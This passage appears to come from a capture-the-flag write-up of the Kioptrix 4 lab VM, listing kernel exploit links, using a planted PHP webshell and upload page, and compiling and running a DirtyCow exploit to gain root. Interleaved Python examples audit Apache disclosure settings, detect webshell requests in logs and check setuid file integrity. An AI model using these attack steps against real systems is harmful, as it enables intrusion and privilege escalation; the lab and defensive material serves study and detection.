- Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
- < 2.6.37-rc2 ACPI custom_method Privilege Escalation || http://www.exploit-db.com/exploits/15774 || Language=c
- 'pipe.c' Local Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/10018 || Language=sh
- 2.4/2.6 sock_sendpage() Local Root Exploit [3] || http://www.exploit-db.com/exploits/9641 || Language=c
- <= 2.6.37 Local Privilege Escalation || http://www.exploit-db.com/exploits/15704 || Language=c
- 2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/895 || Language=c
Finished
=================================================================================================
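The apache2.conf dumped above has ServerTokens Full and ServerSignature On, so the Server header and every server-generated page hand out the exact Apache, OS and module versions, which is what makes version-based exploit lookups like the one above so quick. As an added example, not part of the original write-up and not a tool that ships with Apache, here is a small Python audit that parses top-level directives, applies Apache's last-occurrence-wins rule, reports the effective values against hardened ones, and can rewrite the offending lines. The WEAK_CONF sample is constructed from directives in the dump above; the Apache 2.2 defaults used when a directive is absent (Full for ServerTokens, Off for ServerSignature) come from Apache's own documentation.

```python
import re

# Defaults Apache 2.2 applies when the directive is absent (the comment in the
# dumped apache2.conf states Full for ServerTokens; Off is the documented
# default for ServerSignature).
DEFAULTS = {"ServerTokens": "Full", "ServerSignature": "Off"}

# Minimum-disclosure values. "Prod" still reports "Apache", just no version.
HARDENED = {"ServerTokens": "Prod", "ServerSignature": "Off"}

DIRECTIVE_RE = re.compile(r"^([A-Za-z]+)\s+(.+?)\s*$")

# Constructed sample built from directives seen in the dump above.
WEAK_CONF = """\
# ServerTokens
# Set to one of: Full | OS | Minor | Minimal | Major | Prod
ServerTokens Full
#
ServerSignature On
<Directory "/usr/share/apache2/error">
    AllowOverride None
</Directory>
"""


def parse_top_level_directives(text):
    """Return {directive: value} for top-level directives, last occurrence wins.

    Lines inside <Directory>/<VirtualHost>/... containers are skipped because
    they scope differently; comment lines (leading '#') are ignored.
    """
    directives = {}
    depth = 0
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if stripped.startswith("</"):
            depth -= 1
            continue
        if stripped.startswith("<"):
            depth += 1
            continue
        if depth:
            continue
        m = DIRECTIVE_RE.match(stripped)
        if m:
            directives[m.group(1)] = m.group(2)
    return directives


def audit_disclosure(text):
    """Return (directive, effective_value, recommended_value) for each weak setting."""
    directives = parse_top_level_directives(text)
    findings = []
    for name, hardened in HARDENED.items():
        effective = directives.get(name, DEFAULTS[name])
        if effective.lower() != hardened.lower():
            findings.append((name, effective, hardened))
    return findings


def harden(text):
    """Rewrite top-level disclosure directives to their hardened values.

    Existing occurrences are replaced in place (so comments and order survive);
    a directive that never appears is appended at the end.
    """
    out, seen, depth = [], set(), 0
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("</"):
            depth -= 1
        elif stripped.startswith("<"):
            depth += 1
        elif depth == 0 and not stripped.startswith("#"):
            m = DIRECTIVE_RE.match(stripped)
            if m and m.group(1) in HARDENED:
                line = f"{m.group(1)} {HARDENED[m.group(1)]}"
                seen.add(m.group(1))
        out.append(line)
    for name, value in HARDENED.items():
        if name not in seen:
            out.append(f"{name} {value}")
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for name, effective, recommended in audit_disclosure(WEAK_CONF):
        print(f"{name}: {effective} -> set to {recommended}")
    print(harden(WEAK_CONF))
```

Running it against the sample reports both directives; running it against an empty file still reports ServerTokens, because the absent directive falls back to Full. Note that the Include lines at the end of the dump pull in further files, so a real audit has to follow those includes before trusting the effective value.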
After a lot of workarounds I found a backdoor on the compromised target, containing a webshell and a file-upload tool, which I did not notice when I first connected to the web application's root directory, and I paid a few hours for that.
Backdoor located:
http://172.16.0.100/tmpbymrg.php?cmd=id -> Shell
http://172.16.0.100/tmpurgaq.php -> Upload
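Those two files are exactly what shows up in the Apache access log, given the combined LogFormat in the dumped config above. As an added example, not part of the original write-up, here is a Python parser for that log format which flags requests to PHP files outside the known application paths and requests carrying a command-style query parameter. The log lines, the client IP and the KNOWN_PATHS set are constructed for the example; the two tmp*.php names are the ones found on this box, and the parameter names other than cmd are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Regex for Apache's "combined" LogFormat as defined in the dumped apache2.conf:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Query parameters that one-line PHP webshells commonly read a command from.
# "cmd" is the one the backdoor on this box uses; the others are assumptions.
SHELL_PARAMS = {"cmd", "c", "exec", "command"}

# Paths the legitimate application is known to serve (constructed; in practice
# generate this from the deployed source tree).
KNOWN_PATHS = {"/index.php", "/login.php"}

# Constructed access-log lines in combined format. The client IP is made up;
# the two tmp*.php requests mirror the backdoor URLs above.
SAMPLE_LOG = [
    '172.16.0.50 - - [30/Nov/2019:13:20:01 -0500] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '172.16.0.50 - - [30/Nov/2019:13:21:14 -0500] "GET /tmpbymrg.php?cmd=id HTTP/1.1" 200 58 "-" "Mozilla/5.0"',
    '172.16.0.50 - - [30/Nov/2019:13:22:30 -0500] "POST /tmpurgaq.php HTTP/1.1" 200 212 "http://172.16.0.100/tmpurgaq.php" "Mozilla/5.0"',
    '172.16.0.50 - - [30/Nov/2019:13:23:00 -0500] "GET /login.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]


def parse_combined(line):
    """Parse one combined-format line into a dict (with method/path/proto split out), or None."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split()
    rec["method"], rec["path"], rec["proto"] = (parts + ["", "", ""])[:3]
    return rec


def classify(rec, known_paths):
    """Return the reasons (possibly none) a parsed request looks like webshell activity."""
    reasons = []
    url = urlsplit(rec["path"])
    params = parse_qs(url.query)
    unknown_php = url.path.endswith(".php") and url.path not in known_paths
    if unknown_php:
        reasons.append("php file outside known application paths")
    if SHELL_PARAMS & set(params):
        reasons.append("command-style parameter in query string")
    if unknown_php and rec["method"] == "POST":
        reasons.append("POST to unknown php file (possible upload)")
    return reasons


def find_webshell_hits(lines, known_paths=KNOWN_PATHS):
    """Scan log lines; return (path, status, reasons) for each suspicious request."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue  # not combined format; a real tool would count these
        reasons = classify(rec, known_paths)
        if reasons:
            hits.append((urlsplit(rec["path"]).path, int(rec["status"]), reasons))
    return hits


if __name__ == "__main__":
    for path, status, reasons in find_webshell_hits(SAMPLE_LOG):
        print(f"{path} ({status}): {'; '.join(reasons)}")
```

The known-paths allowlist is what does the real work here: parameter names are easy to rename, but a PHP file that the application never shipped is hard to hide in the log, and the same check applied to the webroot on disk would have surfaced both files before any log review.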
So the situation is this: there is no gcc on the target system, and there is no way for me to transfer files directly. To work around that, it was necessary to cross-compile the exploit on the local machine, then send it to the target through the file-upload functionality of the PHP backdoor planted there, and execute it.
Local: apt-get install gcc-multilib
Local: gcc cowroot.c -o cowroot -pthread -m32 -march=i686
With the exploit compiled for the target's architecture and placed on the target system, it can be run to escalate privileges to root (uid 0).
john@Kioptrix4:/tmp$ ./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 29104
Racing, this may take a while..
thread stopped
thread stopped
ABORTED
john@Kioptrix4:/tmp$ ./c0w
(___)
(o o)_____/
@@ ` \
\ ____, //usr/bin/passwd
// //
^^ ^^
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap b7d91000
madvise 0
ptrace 0
john@Kioptrix4:/tmp$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@Kioptrix4:/tmp$ /usr/bin/passwd
root@Kioptrix4:/tmp# id
uid=0(root) gid=1001(john) groups=1001(john)
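Seen from the defender's side, the output above is a file-integrity event: /usr/bin/passwd was backed up to /tmp/bak and overwritten in place, and running the setuid binary afterwards yields uid 0. As an added example, not from the write-up or from the exploit's author, here is a Python baseline check that hashes every setuid/setgid file under a root and reports modified, new and missing entries. demo() builds the scenario in a temporary directory with constructed file contents, so it runs without touching the real system.

```python
import hashlib
import os
import stat
import tempfile


def sha256_of(path):
    """Hash a file in chunks so large binaries never need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_setuid_files(root):
    """Return regular files under root that carry the setuid or setgid bit."""
    found = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append(path)
    return sorted(found)


def build_baseline(root):
    """Map each setuid/setgid file under root to its SHA-256 (the trusted snapshot)."""
    return {path: sha256_of(path) for path in find_setuid_files(root)}


def compare_to_baseline(root, baseline):
    """Diff the current setuid inventory against a stored baseline."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "new": sorted(p for p in current if p not in baseline),
        "missing": sorted(p for p in baseline if p not in current),
    }


def _write_setuid(path, data):
    """Write data to path and (re)apply mode 4755. Linux clears the setuid bit
    when a process without CAP_FSETID writes to a file, so chmod comes last."""
    with open(path, "wb") as f:
        f.write(data)
    os.chmod(path, 0o4755)


def demo():
    """Constructed scenario in a temp dir: one setuid file is overwritten in
    place (what the exploit output above shows happening to /usr/bin/passwd)
    and a second setuid file appears. Returns the report keyed by base name."""
    with tempfile.TemporaryDirectory() as root:
        passwd = os.path.join(root, "passwd")
        _write_setuid(passwd, b"original setuid binary (constructed)")
        baseline = build_baseline(root)

        _write_setuid(passwd, b"replaced contents (constructed)")
        _write_setuid(os.path.join(root, "rogue"), b"new setuid file (constructed)")

        report = compare_to_baseline(root, baseline)
        return {k: [os.path.basename(p) for p in v] for k, v in report.items()}


if __name__ == "__main__":
    print(demo())
```

On a real host the baseline has to be stored off-box (or signed), because anything writable as root after the escalation can be adjusted to match; on a Debian-based system like this one, dpkg's own package manifests are a second, independent source of expected hashes for the same comparison.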
Then it's just a matter of grabbing the flag!
root@Kioptrix4:/root# cat congrats.txt
Congratulations!
You've got root.
There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret
That's it, more write-ups coming soon.